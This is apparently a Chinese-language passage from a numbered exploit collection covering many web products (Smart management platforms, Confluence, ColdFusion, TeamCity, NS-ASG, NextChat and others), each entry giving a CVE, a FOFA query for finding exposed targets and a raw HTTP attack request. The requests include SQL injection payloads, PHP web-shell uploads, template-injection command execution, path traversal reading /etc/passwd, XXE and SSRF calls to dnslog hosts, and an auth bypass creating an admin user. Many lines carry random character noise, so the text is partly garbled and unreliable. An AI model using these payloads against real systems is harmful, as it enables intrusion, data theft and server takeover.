6 j- Y2 t7 i7 Z! G, W+ m, h4 {: vContent-Type: application/x-www-form-urlencoded;
7 }/ \. k0 y+ m4 T- l. ^ OContent-Length: 109
0 X: a O% T6 Q* A r3 fOrigin: https://58.18.133.60:8443
0 n- Z8 [/ W1 N: [$ M. p, @Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php" O9 e# S& A# `
Sec-Fetch-Dest: empty! C, ?; Z0 A: A! q
Sec-Fetch-Mode: cors
+ {8 B9 O* ^6 A" }6 {Sec-Fetch-Site: same-origin
$ F1 ]! Y ~) w& K4 J1 q" d" fX-Forwarded-For: 1.1.1.1, a3 o# F+ H. q+ m2 I' b( {1 C+ a
X-Originating-Ip: 1.1.1.1
& F9 G. M5 ?, h1 Y4 z& M! KX-Remote-Ip: 1.1.1.1
; W7 J: Q, f. j7 j' oX-Remote-Addr: 1.1.1.1
! v- F" H1 u2 A7 _) _. ITe: trailers- j# ?, |- A! @) ^
Connection: close
! _- q( g6 Q6 T4 d- M, f/ M W: Y4 Z
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
* [* y8 x- a7 _* P- u
7 ~- i! ~$ A* j. D& ?6 {$ A5 |2 u7 t" ] \) s
120. 北京百绰智能S40管理平台导入web.php任意文件上传
/ X: E. a. [: O) V/ UCVE-2024-12537 b1 D- P! c7 q& e# f
FOFA:title="Smart管理平台"
: _; @4 R) c( Z' A8 A0 M& l* jPOST /useratte/web.php? HTTP/1.1
* @. u+ Z# F9 I8 T" y, e+ O( _Host: ip:port
3 G' T; J0 z* w$ ]5 p8 ^Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
4 a2 T ?8 F- Y( N9 p/ `- z$ MUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
8 }# L6 {0 m2 G& w3 H3 H# nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 t3 o3 r8 C4 T: N2 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& o- g% A3 g" f' D0 G6 F! V
Accept-Encoding: gzip, deflate
9 z" P; j% q3 O' MContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328/ r1 V+ W' L" ]2 }- t$ w/ _
Content-Length: 597! ?" ]& C0 |/ N1 l U, @3 g
Origin: https://ip:port/ R0 ^1 c0 y( Y4 l9 |
Referer: https://ip:port/sysmanage/licence.php
# e- J5 l" D) S* hUpgrade-Insecure-Requests: 1
9 D: Z2 A4 u* DSec-Fetch-Dest: document
1 L9 c/ D: X0 q7 n- } W( ?Sec-Fetch-Mode: navigate
' Y$ x1 T8 I* \Sec-Fetch-Site: same-origin
, V2 m: L6 F( zSec-Fetch-User: ?1% B6 Z% C: N4 W* r) }0 h, o
Te: trailers. Q& S3 I; M3 m8 C
Connection: close9 x. L( b+ j% r( P8 y9 {4 `
5 F9 }0 G. f4 }) W) z-----------------------------42328904123665875270630079328- ^1 N }5 w; n/ f8 H
Content-Disposition: form-data; name="file_upload"; filename="2.php"# K/ Z, `4 x. y' R: X1 W( `% i
Content-Type: application/octet-stream
& f1 V* u& K6 {$ w# ^: L/ l4 O D: a. W; l7 V- B; V# n
<?php phpinfo()?>% N% T2 P2 Z+ H
-----------------------------42328904123665875270630079328. n; x7 t7 l% G0 n4 a
Content-Disposition: form-data; name="id_type"% q/ k/ b0 x; o/ k4 d
# y, {9 L, r2 ~+ @5 h0 I/ f n/ l) c1+ D4 b* N8 p+ a. M, [
-----------------------------42328904123665875270630079328
! F1 I) N7 P" k0 mContent-Disposition: form-data; name="1_ck"
# ^9 h2 T! k) ]6 h e" H' n5 t. y" J' S2 t
1_radhttp; E3 B+ k2 ?- p1 q" b# b
-----------------------------423289041236658752706300793283 P+ M8 b7 w" M3 p+ r4 y
Content-Disposition: form-data; name="mode"
/ l: j9 f% |" }9 l$ Z D( c' b% n, K" G5 M V7 Y/ y5 J z Y
import
2 {4 d2 m8 Q5 H9 u0 M# n% u8 H-----------------------------42328904123665875270630079328( t. M, R5 k6 D
) Z# w, R& {$ _$ }: U5 j
: N6 d& ]; b- h+ @! @& n' z+ F# J
文件路径/upload/2.php
0 H1 W/ F" t( U% M! [- }4 K8 R4 g, F5 D' g
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
$ Z* l9 B5 G; T& G. i2 d; KCVE-2024-1918
$ T5 W7 b' B7 E( U& AFOFA:title="Smart管理平台"
7 t2 b2 @1 g3 V7 c7 M" QPOST /useratte/userattestation.php HTTP/1.1
9 h0 `9 y+ f) r7 {: k5 iHost: 192.168.40.130:8443. | ]: [2 |1 S- U( d8 f
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50& j: J, u+ z) W4 { e5 Q8 k
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko; o# O& E: }/ U+ P3 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ H, A& U2 o( H- U3 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ B4 L; S( l6 z9 L2 L* K$ N i P
Accept-Encoding: gzip, deflate5 |7 R; ~" K2 G. }7 [
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& f2 q5 i6 a+ V0 c0 DContent-Length: 592
, ^2 C( y2 U# }' w. m M7 mOrigin: https://192.168.40.130:84438 p2 A) u" m+ ` c. j2 ~5 X# G0 g7 }
Upgrade-Insecure-Requests: 1
$ H1 w: }* Q7 D$ m6 H+ K+ kSec-Fetch-Dest: document
) {" Y( B- K: E- K. {0 V {$ M4 ]Sec-Fetch-Mode: navigate
: G7 [$ L% `2 WSec-Fetch-Site: same-origin
% ]7 r7 \& {% |3 V- {4 ]$ BSec-Fetch-User: ?1
6 R8 K; w W, @, f/ TTe: trailers
- H* i3 ^5 K- I- r- l- w; j6 RConnection: close5 ]; k, c2 b& q, Q2 k
2 p% k1 `+ y6 h5 D: g
-----------------------------42328904123665875270630079328
( u" ^- P: N" V! Q- j, C: IContent-Disposition: form-data; name="web_img"; filename="1.php": R! P8 Q% Q) o$ M
Content-Type: application/octet-stream
3 k0 G/ e" z" {. P6 [/ z g. S. j) V! c
<?php phpinfo();?>
g+ V; a6 m. w& G1 [# v; N* e-----------------------------42328904123665875270630079328
- ]- N' L. T% B, x6 e/ wContent-Disposition: form-data; name="id_type"
6 Q* m0 U& E1 m* ?9 S! i0 L6 z, _$ i
7 [3 T: L+ X7 v9 x, a1! U3 O- x( f% Z7 ^/ s9 A- t% P
-----------------------------42328904123665875270630079328
. w% H: k5 l1 E* [! ?% j5 L4 mContent-Disposition: form-data; name="1_ck"
) U' K6 r' w- k' E3 Y: T
; `2 w: J% L$ r, b) \6 u8 p1_radhttp! i3 L$ N) ?6 ?# @
-----------------------------42328904123665875270630079328
2 S8 p/ Q7 A, p Q' cContent-Disposition: form-data; name="hidwel"2 y0 z$ S" R9 P, h( O
1 e% e7 M g3 {, Q: n0 @ @set
* A- M0 b! X. ]; V4 r$ t-----------------------------42328904123665875270630079328* y. Z+ a; O9 R ?' d. Z" q& Z
$ o- w+ x+ o0 a7 ^: V0 r( s# N
' Y) i/ r- P& ]7 ], W( B4 u3 W0 Wboot/web/upload/weblogo/1.php2 d5 A7 j: H( N
: I, V" u5 N# N( g- h' Z122. 北京百绰智能s200管理平台/importexport.php sql注入
- u0 \; {* w4 a; pCVE-2024-27718FOFA:title="Smart管理平台"* Y& m' P. v0 I, q0 N
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()( O) x* r4 I' H$ ?: @* |
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.17 ^9 }. G+ R5 K
Host: x.x.x.x
7 h# R% w: J! h" f% m3 H7 s5 fCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0+ n* O0 z. ?- X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 Z1 B5 }, ]5 j1 w( I6 y. \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 J) w9 k! e6 C+ tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; v$ k# Z0 P+ I1 B9 S% T8 jAccept-Encoding: gzip, deflate, br
! O! Z3 u4 i& k6 d: A2 a7 E: uUpgrade-Insecure-Requests: 1$ B" d9 v; g& g3 H+ d; K
Sec-Fetch-Dest: document& O/ Q3 n+ Q% v! X7 @ h
Sec-Fetch-Mode: navigate V5 n( p1 s* r# @8 ` T$ N4 U# ?. b
Sec-Fetch-Site: none. M+ R# S( Z; e- D
Sec-Fetch-User: ?1 l# H, k0 n3 w- D
Te: trailers
A; d6 N5 l. ]- gConnection: close+ O# t3 b7 F l5 F, V
' z) `! I+ p2 h" f$ S
% W' P, z3 B3 F% Y( d9 m
123. Atlassian Confluence 模板注入代码执行( k$ j% k& I; p0 P( T- V
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
6 @1 j# g' C1 u2 @POST /template/aui/text-inline.vm HTTP/1.1! j( @5 V6 `' ~4 T9 ^8 k( ]
Host: localhost:8090
! ?1 C" w a. q$ t( Q3 w# yAccept-Encoding: gzip, deflate, br" L& p8 X% x$ h! n' A. A
Accept: */*
; g/ G1 R( C5 vAccept-Language: en-US;q=0.9,en;q=0.8
2 w! u. F6 t& ]1 M2 X8 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
. i% o; Y' p" c5 A- u* cConnection: close9 }) P' j; @# M' V3 ~* t+ j
Content-Type: application/x-www-form-urlencoded" m9 b$ J) n9 N3 ~. o7 ]4 e3 x/ E
: M: k- U' r! \; Q' w- Z
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})). |- h- g6 |* S7 F2 r
5 C t' O: N! w& ^9 h
3 z; `. z( v+ k% d3 i( r. U$ \
124. 湖南建研工程质量检测系统任意文件上传9 a+ V$ v! p; B+ `7 l2 Y6 n$ I
FOFA:body="/Content/Theme/Standard/webSite/login.css"5 p n& L3 k# d% Z2 q5 D6 F
POST /Scripts/admintool?type=updatefile HTTP/1.1
" j4 d7 b9 s# ]& C) oHost: 192.168.40.130:8282/ c0 B7 X* ~; P- X s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 v; W. |3 g' e0 s z( d/ L) W
Content-Length: 72$ L- m; ?; Y3 w7 e5 C9 ]1 g! l0 @. O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.81 q" s7 f( h8 ?
Accept-Encoding: gzip, deflate, br. K5 F8 a0 e, P7 p# [( ^ Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) g* i9 Y5 T* ~! T
Connection: close4 s* p" H# L9 w! V: l" b/ X
Content-Type: application/x-www-form-urlencoded
& |1 h5 P2 l! Q# Z D/ z3 G) X0 J5 \* s0 s# | O! H
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>% G; {& d1 u# }( q9 S
3 z7 K; ~+ L4 V7 g
7 X8 G) A) i# x( X& Ihttp://192.168.40.130:8282/Scripts/abcgcg.aspx, }7 G! v% b: B+ e
: U/ i# H# k: r1 ~
125. ConnectWise ScreenConnect身份验证绕过
. ~ M1 U; K+ u% Y% ZCVE-2024-1709
$ p2 p+ s0 I0 T( VFOFA:icon_hash="-82958153"
% w# u! I( d" {1 I, ^; Bhttps://github.com/watchtowrlabs ... bypass-add-user-poc9 {7 |5 `* r6 |! f2 I; ~; @
+ ? C! \* g" H: Y+ f' S
5 b1 h e! {8 h5 |5 P" X
使用方法
* j& c1 ~( ]! _/ c! mpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
3 h4 ?! Y; |) Z4 ~- @- R. v: \: H0 P, n9 U8 `+ c6 E) _: r9 Q
. H0 M5 L. X4 S! v* \ V创建好用户后直接登录后台,可以执行系统命令。/ P. I% F2 \. U& k, H: ?1 T+ s+ ?
" K+ w: W, X" y5 q* P126. Aiohttp 路径遍历5 `7 [5 R* B. q
FOFA:title=="ComfyUI"- \% p4 i1 R8 X. U, V
GET /static/../../../../../etc/passwd HTTP/1.1, j/ G& h* i5 c2 h* c; b
Host: x.x.x.x4 P5 O4 P$ E' W, ]; ^) p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 D: D, v4 o5 b. ~+ zConnection: close
; y E k* I O" g) H% sAccept: */*% }1 q7 L% k# x5 g
Accept-Language: en
9 F- K n) i/ ]/ iAccept-Encoding: gzip
1 i) E3 o0 H4 M, z3 L5 [6 O7 W# o. k
! g# m; S# W0 V1 ?9 `: A& o r% k% t! `$ T) ]8 A+ B
127. 广联达Linkworks DataExchange.ashx XXE
E, Q+ R8 F z# i* _FOFA:body="Services/Identification/login.ashx"
6 k3 p% {- m& ?( p4 @5 E' i0 hPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
8 {/ x/ k" O- F+ z. V% \% g2 `Host: 192.168.40.130:8888
+ I P3 _! @$ L2 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36; o8 q5 w9 g- p$ c/ r; m- I1 M. B
Content-Length: 415
2 @# V+ l2 Z* M$ t* LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 `5 r. `* m# IAccept-Encoding: gzip, deflate
8 b! P6 X- O* M+ X' F8 a: b) x$ `* FAccept-Language: zh-CN,zh;q=0.9
! q, a0 G* T, k0 F# t. H: eConnection: close
6 ~" y& ?: {) | I0 PContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe01 T; \3 |- Q& t( q4 v7 l
Purpose: prefetch
( I* [9 D0 v# x- mSec-Purpose: prefetch;prerender
4 ^" A& M" Z6 f- b! K: ~# p) l* @0 u- \0 k C# {' w) \
------WebKitFormBoundaryJGgV5l5ta05yAIe09 }/ D$ _4 @, D- w: t/ }. u
Content-Disposition: form-data;name="SystemName"+ @, z7 G5 C( A6 e. c! c8 a
5 i1 H* F' _; `1 m5 D5 Q9 w5 aBIM" a6 Q& p. n- J* p( U
------WebKitFormBoundaryJGgV5l5ta05yAIe0! ?/ u s/ t# a6 D* m
Content-Disposition: form-data;name="Params"! p- ~9 |# d; h$ c
Content-Type: text/plain
. Z' Z; u) w/ u, G: P+ D( P5 X3 w, D& f$ h8 f
<?xml version="1.0" encoding="UTF-8"?>7 n- }1 B+ h p8 _( j6 }
<!DOCTYPE test [3 Z6 g1 d4 \+ ?) T: S; g7 L; m, V
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">" j3 U3 d) Y( q7 Y
]
3 Q" ~) R# j; r% c>; y+ ]' m' x/ y6 I
<test>&t;</test>
$ @ ^2 o5 G3 R9 P; {' T3 f------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% m9 {* ]3 b- p0 H( P( v: L5 @' j. ~. W+ a; U& f5 u( g
+ W6 P7 q2 j0 r3 W: e
7 X6 D S4 W6 h% Z128. Adobe ColdFusion 反序列化6 o! r5 H) x+ w& k1 C; w' `2 l, C; c
CVE-2023-38203
+ K+ U. I$ [0 I) h$ AAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)1 q: z) X, Q) Z" z* w
FOFA:app="Adobe-ColdFusion"% Q% r0 b* ?% h% H
PAYLOAD$ W8 O2 \+ @. \+ M
5 V5 {; \0 V0 h" o% r+ V1 ~' D129. Adobe ColdFusion 任意文件读取! Y( e' B2 P3 P' X
CVE-2024-207678 i Y, U9 Y/ c9 x( B n
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request", q% ?4 g i. X
第一步,获取uuid! y4 D( T+ k- P
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.12 c! p/ \; i! x4 c) q5 D* s
Host: x.x.x.x
9 e- d$ ], N* ^4 J5 T& P1 L- B3 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 W, l; J9 z |% N, kAccept: */*
5 F. ^5 W" p& ~5 @; h! iAccept-Encoding: gzip, deflate) V0 W/ K( ?# V0 G2 X2 u/ s# s
Connection: close
5 b; _9 T. ? S' v# t8 s9 N) y% r- s. Q/ ~1 m
5 i- c: j% r% m- e第二步,读取/etc/passwd文件
+ H4 F/ u/ I& d5 s9 a% R& T, K( MGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
) z) m1 x9 s& B p3 y0 @Host: x.x.x.x
& i5 o2 w5 n$ i9 L- c: oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: j( \& |8 O+ P/ U) H+ mAccept: */*8 C5 T" b) i7 q& e4 w
Accept-Encoding: gzip, deflate
$ R& Y1 `4 s" o( L# p0 u1 ZConnection: close
4 g& a+ K4 R( b- n$ Huuid: 85f60018-a654-4410-a783-f81cbd5000b9
0 Q3 {4 U0 @0 Q4 q* x5 o; b0 q1 z1 A* N, P% L, v- v
! `: |- d' A h! L1 m
130. Laykefu客服系统任意文件上传( r& n5 x' @; J, ~; W. W* l9 G
FOFA:icon_hash="-334624619"% P1 r/ l+ [7 X+ |$ n+ x! [
POST /admin/users/upavatar.html HTTP/1.1$ j- l# e! f2 }, u& l+ S) e
Host: 127.0.0.10 l0 B2 k; \$ W8 y
Accept: application/json, text/javascript, */*; q=0.012 {7 G$ `" u" b: ]" A( T- T
X-Requested-With: XMLHttpRequest4 ?3 R* a* e4 }3 L
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26; @% z( r R. _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR9 Y8 f8 ~0 m1 e7 O2 \
Accept-Encoding: gzip, deflate4 w b" q& [, I8 [
Accept-Language: zh-CN,zh;q=0.9# e8 q, p% M$ x+ D
Cookie: user_name=1; user_id=32 l5 J. E W& h) s2 O2 e
Connection: close
8 K% U0 z8 f' G B5 M: `; h3 m# m5 b$ d3 R' ]9 A; C* [3 Q' y
------WebKitFormBoundary3OCVBiwBVsNuB2kR: X. X$ Q. Z' i7 N& C1 i& Z
Content-Disposition: form-data; name="file"; filename="1.php"
+ I) g& C1 I4 g1 b$ L& Q) R& AContent-Type: image/png* O5 Z. s7 h' c6 f( U3 v
6 I) S$ y! ]0 Y; o5 G<?php phpinfo();@eval($_POST['sec']);?>/ v+ S" U3 P3 i$ J. R* z
------WebKitFormBoundary3OCVBiwBVsNuB2kR--% x: N% R" y5 Z0 T$ H: t
# G4 D' ~4 j/ z0 k, C6 n( f" p+ L- R; ~: D3 O* z9 J
131. Mini-Tmall <=20231017 SQL注入# B6 F* E. z5 x2 t
FOFA:icon_hash="-2087517259"% y) r6 {. ~" D3 L _3 D
后台地址:http://localhost:8080/tmall/admin8 x- p+ @2 X8 I5 l9 B
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
' ~% t) U0 _7 [
; s }( S: q" w$ X5 D, u132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
4 m k& Y8 \5 ]7 C LCVE-2024-27198! q U y& a: j, C% M: y
FOFA:body="Log in to TeamCity"
! I0 k" c8 q$ _POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1$ v: ~ F4 d9 X$ P/ m; r2 J
Host: 192.168.40.130:8111% \! E/ n' d) e5 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 C% |4 _8 n }- m K
Accept: */*) k/ D- q9 Z/ S& p! e9 M
Content-Type: application/json0 g, n$ u' D3 }5 L) \% p
Accept-Encoding: gzip, deflate
( z2 }1 ?' ~9 T% N/ I
) `: y" v) ^- I k/ D{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}} }; {/ o' w+ w0 \. e# b2 Q
' |3 X: h; a7 F+ w& ^) {) A& I
7 q2 z- u! y4 X1 ]1 M. O) x
CVE-2024-27199
- N! K W) k& V/res/../admin/diagnostic.jsp. f) s0 K9 d9 {: _* v' i
/.well-known/acme-challenge/../../admin/diagnostic.jsp
0 _& j I) v0 s2 ?7 b! y! l/update/../admin/diagnostic.jsp
4 |# j4 U# }& {% L/ @* F. k
$ q L E* I: e1 `5 j
1 v- k8 o7 k) ^5 QCVE-2024-27198-RCE.py+ Z+ ?) G2 u4 ^
# E/ a, {% Z0 r
133. H5 云商城 file.php 文件上传
+ s9 h) J9 Y1 A% D. p# @FOFA:body="/public/qbsp.php"9 b) G) ]6 G f5 m7 k2 h7 @
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
w* ~. ^' A3 W. fHost: your-ip
; J, w+ c! X; ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 w' g: r* Y7 T# J8 n) iContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx( X# g* S3 m. e( T4 O7 O
x7 A. g( _! X7 d8 ?" z' ~------WebKitFormBoundaryFQqYtrIWb8iBxUCx( ]4 i( n4 ]* q; |% g3 D4 k/ |0 E( _
Content-Disposition: form-data; name="file"; filename="rce.php") k' Q; C* q* [
Content-Type: application/octet-stream
4 H$ O% |. S' } + ^- j+ r d7 J m. |
<?php system("cat /etc/passwd");unlink(__FILE__);?>( _: `& O0 s: @ O! I* G6 R* C7 I
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
- I- B! O8 d& v" `
P: t% H0 u: {, h1 H& V: R0 g! W
" v8 l$ H$ H, }2 g4 o0 v; H$ H$ l9 j) ~7 T+ |3 ]4 j
134. 网康NS-ASG应用安全网关index.php sql注入
& O# x- ?8 o3 `: H' xCVE-2024-2330
5 z/ N5 p' L! ?- P4 t) g2 uNetentsec NS-ASG Application Security Gateway 6.3版本
/ u& z2 _+ q- [# K0 I" h6 o* {% x, ?FOFA:app="网康科技-NS-ASG安全网关"
% k6 Q q9 d' `+ Q7 s/ QPOST /protocol/index.php HTTP/1.1
; z: h, y J' i2 y* gHost: x.x.x.x: `) u* c. J" X6 ]
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de" R: O4 a2 ], @5 f7 z+ T9 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
# N; o/ \5 y3 |9 CAccept: */*
7 G5 T. B. R) W# h ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* R, f. t% C# F. _& T S3 h0 dAccept-Encoding: gzip, deflate9 m" @! Q- Y6 G+ Y
Sec-Fetch-Dest: empty" I$ i/ d) E5 q/ x
Sec-Fetch-Mode: cors4 N, N0 {, P8 L# U
Sec-Fetch-Site: same-origin3 T' B- V! ~0 b% G8 l5 u. G
Te: trailers C/ n: i8 L1 n3 D
Connection: close1 H9 T# K3 h( `) x. P T$ A
Content-Type: application/x-www-form-urlencoded4 D3 ?" y# k B
Content-Length: 263
- ^" n- d& w2 x1 { { P' ^& q3 J- G2 o
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}) n. x& t) k. k& N
$ h# Y- L$ M- n$ Y1 i- R4 O4 s
. B1 }3 O! G2 g7 C9 a# e* f135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入" C/ Q3 T; m3 a5 r% q
CVE-2024-2022. V) b m& H& w% j, A* ~: S
Netentsec NS-ASG Application Security Gateway 6.3版本
. Y- K8 l l _9 _# w% H* S0 @2 SFOFA:app="网康科技-NS-ASG安全网关"
+ f; h( \* g+ p# ?GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
. S7 S6 \2 j; `1 S1 {Host: x.x.x.x5 w8 V: C+ N& A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ {, X9 ~! l, X$ r% b' M, I; i- PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: g. \0 D( |7 m# k! a: e
Accept-Encoding: gzip, deflate9 B! t4 @: ]4 @9 s- a4 v% t
Accept-Language: zh-CN,zh;q=0.9
8 ?2 }2 q! X) eConnection: close$ ] ^4 E$ V# W5 r/ b& V$ B
q# d2 f) v6 O t$ e8 M8 h8 M
* E( R T8 M0 O, [8 U4 T136. NextChat cors SSRF
3 s# O/ M/ z9 ECVE-2023-49785( K1 L' C f6 F: p" g
FOFA:title="NextChat"
. T$ N; P; ^$ f; YGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.11 \, i4 K: g y
Host: x.x.x.x:10000" i- U) s% \5 w& p/ C+ |' y1 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 V* J" e+ x7 v( w- t- vConnection: close$ u' a! Q9 |- D; y' M: J
Accept: */*) K% ^3 I6 Y9 E
Accept-Language: en
/ q" g2 }% O9 p% oAccept-Encoding: gzip i) Z8 z( N7 g" R- b% m- _1 \
8 |) I- T7 G) z' k
5 t& D8 y) S' }$ P$ ]+ j t137. 福建科立迅通信指挥调度平台down_file.php sql注入
' k/ @- h4 S' T3 F+ ~CVE-2024-2620
) G; b* ^5 g1 L) G# q3 `1 x; ?# g; JFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% l9 u' V/ U; G) F/ W. g; M- {
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1$ G7 N2 O, W0 x9 I0 N6 e
Host: x.x.x.x
% m/ z6 V( o5 L9 c6 e5 V5 \( }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 X# K7 X$ Q/ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 R6 @3 I0 l3 K! u' D, |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; m5 Y* A, |! }, O O
Accept-Encoding: gzip, deflate, br: @* c6 v; L+ r; {) `* b2 p
Connection: close
' H, y. K' R; V/ f7 g: t' c- B$ T+ PCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj8 r9 ~* y9 }7 {
Upgrade-Insecure-Requests: 1
. q- Q! Q) M; {6 H
; t2 R. g7 l" D" x
3 C: D+ }: g' \! o7 y138. 福建科立讯通信指挥调度平台pwd_update.php sql注入. Q* t! j! A' u3 |" V% w+ n
CVE-2024-2621
: }, W; ~" c( n; DFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 W$ A# ~5 A U4 k' M4 D
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1/ u2 Q7 c4 g8 b) ?+ \% S% v
Host: x.x.x.x
5 Z/ \! D" O! z- ]9 Q# ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 [5 `. Q, ?; J. p! o$ Q1 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
